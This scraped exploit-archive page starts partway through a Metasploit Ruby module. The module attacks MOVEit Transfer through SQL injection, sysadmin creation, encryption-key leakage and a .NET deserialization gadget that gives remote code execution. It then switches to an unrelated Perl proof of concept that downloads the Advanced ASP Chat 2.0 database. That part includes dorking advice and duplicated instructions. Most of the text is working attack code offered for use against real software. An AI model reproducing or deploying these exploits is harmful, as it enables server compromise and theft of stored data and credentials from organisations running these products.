FROM moveittransfer.registryaudit WHERE PairName='Key' AND CHAR_LENGTH(KeyName)=#{'Standard Networks\siLock\Institutions\0'.length}) WHERE ID='#{files_json['fileId']}'"    ]    sqli(sqli_payload(haxleak_payload))    leak_response = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("/api/v1/files/#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}"      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #LEAK (#{leak_response.body})") if leak_response.nil? || leak_response.code != 200    leak_json = JSON.parse(leak_response.body)    org_key = leak_json['uploadAgentBrand']    vprint_status("Leaked the Org Key: #{org_key}")    org_key  end  def makev1password(password, salt = 'AAAA')    fail_with(Msf::Exploit::Failure::BadConfig, 'password cannot be empty') if password.empty?    fail_with(Msf::Exploit::Failure::BadConfig, 'salt must be 4 bytes') if salt.length != 4    # These two hardcoded values are found in MOVEit.DMZ.Core.Cryptography.Providers.SecretProvider.GetSecret    pwpre = Base64.decode64('=VT2jkEH3vAs=')    pwpost = Base64.decode64('=0maaSIA5oy0=')    md5 = Digest::MD5.new    md5.update(pwpre)    md5.update(salt)    md5.update(password)    md5.update(pwpost)    pw = [(4 + 4 + 16), 0, 0, 0].pack('CCCC')    pw << salt    pw << md5.digest    return Base64.strict_encode64(pw).gsub('+', '-')  end  def moveitv2encrypt(data, org_key, iv = nil, tag = '@%!')    fail_with(Msf::Exploit::Failure::BadConfig, 'org_key must be 16 bytyes') if org_key.length != 16    if iv.nil?      iv = Rex::Text.rand_text_alphanumeric(4)      # as we only store the first 4 bytes in the header, the IV must be a repeating 4 byte sequence.      iv *= 4    end    # MOVEit.DMZ.Core.Cryptography.Encryption    key = [64, 131, 232, 51, 134, 103, 230, 30, 48, 86, 253, 157].pack('C*')    key += org_key    key += [0, 0, 0, 0].pack('C*')    # MOVEit.Crypto.AesMOVEitCryptoTransform    cipher = OpenSSL::Cipher.new('AES-256-CBC')    cipher.encrypt    cipher.key = key    cipher.iv = iv    encrypted_data = cipher.update(data) + cipher.final    data_sha1_hash = Digest::SHA1.digest(data).unpack('C*')    org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*')    # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader    header = [      225, # MOVEitV2EncryptedStringHeader      0,      data_sha1_hash[0],      data_sha1_hash[1],      org_key_sha1_hash[0],      org_key_sha1_hash[1],      org_key_sha1_hash[2],      org_key_sha1_hash[3],      iv.unpack('C*')[0],      iv.unpack('C*')[1],      iv.unpack('C*')[2],      iv.unpack('C*')[3],    ].pack('C*')    # MOVEit.DMZ.Core.Cryptography.Encryption    return tag + Base64.strict_encode64(header + encrypted_data)  end  def populate_token_instid    begin      res = send_request_cgi({        'method' => 'GET',        'keep_cookies' => true,        'connection' => 'keep-alive',        'accept' => '*/*'      })      cookies = res.get_cookies      # Get the session id from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!') unless cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/      @moveit_token = ::Regexp.last_match(1)      vprint_status("Received ASP.NET_SessionId cookie: #{@moveit_token}")      # Get the InstID from the cookies      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!') unless cookies =~ /siLockLongTermInstID=([0-9]+);/      @moveit_instid = ::Regexp.last_match(1)      vprint_status("Received siLockLongTermInstID cookie: #{@moveit_instid}")    end    true  end  def request_api_token    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/api/v1/token'),      'Content-Type' => 'application/x-www-form-urlencoded',      'connection' => 'keep-alive',      'accept' => '*/*',      'vars_post' => {        'grant_type' => 'password',        'username' => datastore['LOGIN_NAME'],        'password' => datastore['PASSWORD']      }    })    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API token (#{res.body})") if res.code != 200    token_json = JSON.parse(res.body)    vprint_status("Got API access token='#{token_json['access_token']}'.")    token_json  end  def set_session(session_hash)    session_vars = {}    session_index = 0    session_hash.each_pair do |k, v|      session_vars["X-siLock-SessVar#{session_index}"] = "#{k}: #{v}"      session_index += 1    end    isapi_request('session_setvars', session_vars)  end  def sqli(sql_payload)    # Set up a fake package in the session. The order here is important. We set these session    # variables one per request, so first set the package information, then switch over to a    # 'Guest' username to allow the CSRF/injection to work as expected. If we don't do this    # order the session will be cleared and the injection will not work.    set_session({      'MyPkgAccessCode' => 'accesscode', # Must match the final request Arg06      'MyPkgID' => '0', # Is self provisioned? (must be 0)      'MyGuestEmailAddr' => @guest_email_addr, # Must be a valid email address @ MOVEit.DMZ.ClassLib.dll/MOVEit.DMZ.ClassLib/MsgEngine.cs      'MyPkgInstID' => '1234', # this can be any int value      'MyPkgSelfProvisionedRecips' => sql_payload,      'MyUsername' => 'Guest'    })    # Get a CSRF token - this has to be *after* you set MyUsername, since the    # username is incorporated into it    #    # Transaction => request type, different types will work    # Arg06 => the package access code (must match what's set above)    # Arg12 => promptaccesscode requests a form, which contains a CSRF code    body = { 'Transaction' => 'dummy', 'Arg06' => 'accesscode', 'Arg12' => 'promptaccesscode' }    csrf = get_csrf_token(guestaccess_request(body))    # This does the actual injection    body = {      'Arg06' => 'accesscode',      'transaction' => 'secmsgpost',      'Arg01' => 'subject',      'Arg04' => 'body',      'Arg05' => 'sendauto',      'Arg09' => 'pkgtest9',      'csrftoken' => csrf    }    guestaccess_request(body)  end  def sqli_payload(sql_payload)    # Create the initial injection, and create the session object    payload = [      # The initial injection      "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.com')",    ].concat(sql_payload)    # Join our payload, and terminate with a comment character    return payload.join(';') + ';#'  end  def trigger_deserialization(token_json, files_json, folders_json)    files_response = send_request_cgi({      'method' => 'PUT',      'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable&fileId=#{files_json['fileId']}"),      'connection' => 'close',      'accept' => '*/*',      'verify' => false,      'headers' => {        'Authorization' => "Bearer #{token_json['access_token']}",        'Content-Type' => 'application/octet-stream',        'Content-Range' => "bytes 0-#{@uploadfile_size - 1}/#{@uploadfile_size}",        'X-File-Hash' => Digest::SHA1.hexdigest(@uploadfile_data)      },      'data' => @uploadfile_data    })    # 500 if payload runs :)    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #2 code=#{files_response.code} (#{files_response.body})") if files_response.code != 500  end  def upload_encrypted_gadget(encrypted_gadget, files_json)    haxupload_payload = [      "UPDATE moveittransfer.fileuploadinfo SET State='#{encrypted_gadget}' WHERE FileID='#{files_json['fileId']}'",    ]    vprint_status('Planting encrypted gadget into the DB...')    sqli(sqli_payload(haxupload_payload))  end  def exploit    # Get the sessionID and siLockLongTermInstID    print_status('[01/11] Get the sessionID and siLockLongTermInstID')    populate_token_instid    # Allow Remote Access and Create new sysAd    print_status('[02/11] Create New Sysadmin')    create_sysadmin    print_status('[03/11] Get API Token')    token_json = request_api_token    print_status('[04/11] Get Folder ID')    folders_json = find_folder_id(token_json)    print_status('[05/11] Begin File Upload')    @files_json = begin_file_upload(folders_json, token_json)    print_status('[06/11] Leak Encryption Key')    org_key = leak_encryption_key(token_json, @files_json)    print_status('[07/11] Generate Gadget')    gadget = ::Msf::Util::DotNetDeserialization.generate(      payload.encoded,      gadget_chain: :TextFormattingRunProperties,      formatter: :BinaryFormatter    )    print_status('[08/11] Encrypt Gadget')    b64_gadget = Rex::Text.encode_base64(gadget)    encrypted_gadget = encrypt_deserialization_gadget(b64_gadget, org_key)    print_status('[09/11] Upload Encrypted Gadget')    upload_encrypted_gadget(encrypted_gadget, @files_json)    print_status('[10/11] Trigger Gadget')    trigger_deserialization(token_json, @files_json, folders_json)    print_status('[11/11] Cleaning Up')    cleanup_user(@files_json)  endend

MOVEit SQL Injection

Advanced ASP Chat version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Advanced ASP chat 2.0 Database Disclosure Exploit                                                                  |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://p30vel.ir                                                                                                   |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================  
poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# Advanced ASP chat 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : http://p30vel.ir

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('Advanced ASP chat 2.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Tag

#windows